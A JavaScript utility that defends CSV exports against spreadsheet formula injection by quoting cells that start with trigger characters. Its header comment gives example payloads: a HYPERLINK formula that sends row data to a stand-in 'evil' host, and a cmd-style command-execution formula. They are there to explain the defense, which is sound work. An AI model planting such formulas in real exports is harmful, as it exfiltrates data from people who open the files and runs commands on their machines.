// csvSafe — CSV/spreadsheet formula-injection defense (OWASP).
//
// A CSV cell whose text starts with a formula trigger (= + - @, or a leading TAB
// / CR) is EXECUTED by Excel and Google Sheets when the file is opened — even when
// the field is wrapped in quotes (Excel strips the quotes first, then evaluates).
// So an attacker who controls any exported free-text field (a member/lead name, a
// note, a source) can plant `=HYPERLINK("http://evil/?"&A1,"x")` to exfiltrate the
// row, or `=cmd|'/c ...'` style payloads, and it runs on the OWNER's machine when
// they open the export.
//
// Fix: prefix such a cell with a single quote so the spreadsheet shows it as literal
// text instead of evaluating it. This is the OWASP-recommended mitigation and is
// visually unobtrusive (the leading quote is not shown as data in the cell).
//
// NOTE: only CSV exports need this. XLSX built via SheetJS json_to_sheet stores
// strings as string cells (type "s"), which Excel never evaluates as formulas.

const FORMULA_TRIGGER = /^[=+\-@\t\r]/;

export function csvSafeCell(value) {
  const s = value === null || value === undefined ? "" : String(value);
  return FORMULA_TRIGGER.test(s) ? "'" + s : s;
}

// Sanitize every value in an array of row objects (for react-csv <CSVLink data>).
export function csvSafeRows(rows) {
  if (!Array.isArray(rows)) return rows;
  return rows.map((row) => {
    if (!row || typeof row !== "object") return csvSafeCell(row);
    const out = {};
    for (const k of Object.keys(row)) out[k] = csvSafeCell(row[k]);
    return out;
  });
}

export default csvSafeCell;
